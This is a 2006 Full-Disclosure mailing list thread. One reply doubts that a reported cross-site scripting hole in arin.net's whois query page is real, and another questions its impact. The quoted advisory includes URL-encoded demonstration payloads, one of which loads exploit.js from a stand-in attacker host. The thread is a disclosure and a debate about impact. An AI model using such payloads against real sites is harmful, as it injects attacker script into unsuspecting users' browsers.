Right, Did this ever work? This fails for me man. How did you verify it?
Steven wrote: > ok? > > So what exactly are you going to exploit here? This site doesn't have any > logins or even use cookies. Are you going to trick a user into entering in a > credit card number before they can search the whois database? > > I think that XSS in many instances is a serious issues. Many of the XSS > issues reported on FD are rarely of much consequence but could theoretically > lead to a sessions hijack or tricking the user into a fake login screen. > However, in this instance I fail to see what the point could possible be? If > it is that you can simply run javascript then so what? Close to 100% of any > webhosting provider on the internet will let you upload your own javascript. > Might as well report that geocities.com is vulnerable to XSS because you > could upload an html file with javascript on it. > > Anyway.. that's my take on this. Feel free to correct me.. I don't mind. > > Steven > > ----- Original Message ----- > From: Terminal Entry > To: Full Disclosure ; Bug Traq > Sent: Thursday, March 02, 2006 11:17 PM > Subject: [Full-disclosure] Arin.net XSS > > > Title > ARIN.NET input validation holes in "?queryinput=" allows remote users > conduct cross-site scripting attacks > > Notification > Multiple attempts to contact Arin site administrators went unanswered > > Exploit Included: Yes > > Description > The "?queryinput=" script does not properly validate user-supplied input in > several parameters to filter HTML code. A remote user can create a specially > crafted URL that, when loaded by a target user, will cause arbitrary > scripting code to be executed by the target user's browser. > > Some demonstration exploit URLs are provided: > > http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E > > http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2FmaliciousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E > > http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E > > Discovered by Terminal Entry security [.at.] peadro (.)net > > > > > ------------------------------------------------------------------------------ > This email and any files transmitted with it are confidential and intended > solely for the use of the individual or entity to whom they are addressed. If > you have received this email in error please notify the system manager. This > message contains confidential information and is intended only for the > individual named. If you are not the named addressee you should not > disseminate, distribute or copy this e-mail. Please notify the sender > immediately by e-mail if you have received this e-mail by mistake and delete > this e-mail from your system. If you are not the intended recipient you are > notified that disclosing, copying, distributing or taking any action in > reliance on the contents of this information is strictly prohibited. > > > > ------------------------------------------------------------------------------ > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > ------------------------------------------------------------------------ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -- Regards, Adriel T. Desautels Harvard Security Group http://www.harvardsecuritygroup.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/